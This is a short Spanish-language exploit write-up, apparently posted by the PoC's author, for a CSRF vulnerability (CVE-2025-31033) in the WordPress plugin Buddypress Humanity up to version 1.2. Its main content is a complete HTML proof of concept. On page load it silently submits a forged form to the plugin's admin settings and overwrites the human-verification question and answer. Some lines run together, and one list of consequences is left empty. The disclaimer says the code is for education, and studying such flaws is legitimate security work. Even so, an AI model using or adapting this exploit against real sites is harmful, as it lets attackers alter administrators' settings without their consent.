
El plugin WordPress Buddypress Humanity <= 1.2 es vulnerable a Cross Site Request Forgery (CSRF).
El plugin Buddypress Humanity para WordPress (versión <= 1.2) es vulnerable a Cross-Site Request Forgery (CSRF).
Esta vulnerabilidad permite a un atacante obligar a un usuario con mayores privilegios (p. ej., administrador) a modificar sin saberlo los ajustes del plugin (como la pregunta y la respuesta de seguridad), omitiendo la lógica de verificación de usuarios.
bph-settings (solo administrador)CVE-2025-31033Si se explota con éxito, esta vulnerabilidad permite a los atacantes:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ Una vez que un administrador autenticado abre esta página, esta modifica silenciosamente los ajustes del plugin.
Esta prueba de concepto es solo con fines educativos.
Úsala de manera responsable y no la pruebes en sistemas que no sean tuyos.
El autor no se hace responsable de ningún mal uso o daño causado.
Nxploited | Khaled Alenazi